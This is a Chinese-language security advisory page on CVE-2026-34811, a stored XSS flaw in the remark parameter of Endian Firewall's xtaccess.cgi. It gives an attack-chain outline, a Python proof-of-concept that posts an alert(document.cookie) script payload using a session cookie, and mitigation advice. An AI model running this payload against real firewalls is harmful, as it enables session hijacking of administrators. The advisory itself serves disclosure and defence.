IPBUF安全漏洞报告
English
CVE-2026-34811 CVSS 6.4 中危

CVE-2026-34811 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34811
漏洞类型
存储型跨站脚本 (Stored XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

XSS存储型XSSCVE-2026-34811Endian FirewallWeb安全中危

漏洞概述

Endian Firewall 3.3.25及更早版本存在存储型跨站脚本漏洞。攻击者可通过/cgi-bin/xtaccess.cgi接口的remark参数注入恶意脚本。由于未经过滤,代码会被存储并在其他用户访问页面时执行,导致会话劫持或数据窃取。

技术细节

漏洞位于 Endian Firewall 的 Web 管理界面组件 `/cgi-bin/xtaccess.cgi` 中。该脚本在处理用户提交的 `remark` 参数时,未实施严格的输入验证和上下文相关的输出编码。攻击者需具备低权限账户,利用该缺陷构造包含 JavaScript 代码的 Payload 并提交至服务器。系统将恶意数据持久化存储。当管理员或其他授权用户浏览受影响的页面时,Payload 在其浏览器环境中渲染并执行。由于 CVSS 向量包含 S:C(范围变更),攻击者可利用此漏洞绕过当前安全域,获取管理员权限下的敏感信息或执行未授权操作。

攻击链分析

STEP 1
步骤1:侦察与访问
攻击者识别目标为 Endian Firewall,并获取一个低权限的用户账户凭证。
STEP 2
步骤2:载荷注入
攻击者登录后台,向 /cgi-bin/xtaccess.cgi 发送包含恶意 JavaScript 的 remark 参数请求。
STEP 3
步骤3:载荷存储
服务器接收请求并将未经过滤的恶意脚本存储在系统数据库或配置文件中。
STEP 4
步骤4:触发执行
管理员或其他高权限用户访问显示该 remark 信息的页面。
STEP 5
步骤5:利用与影响
恶意脚本在管理员浏览器中执行,窃取 Session ID 或执行管理员权限操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://<target-ip>/cgi-bin/xtaccess.cgi" session_cookie = "<valid_session_id>" # Malicious payload to be injected in the 'remark' parameter xss_payload = "<script>alert(document.cookie);</script>" # Headers and Cookies headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } cookies = { "SID": session_cookie } # Data payload data = { "remark": xss_payload, "action": "save", # Adjust based on actual form action "other_param": "value" } try: # Send POST request to inject payload response = requests.post(target_url, headers=headers, cookies=cookies, data=data) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] Trigger the vulnerability by visiting the page that displays the remark.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
在未升级补丁前,建议管理员暂时禁用非必要的 remark 功能,或在 Web 应用防火墙(WAF)层面对 remark 参数中的特殊字符(如 <, >, ', ", /)进行拦截过滤。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表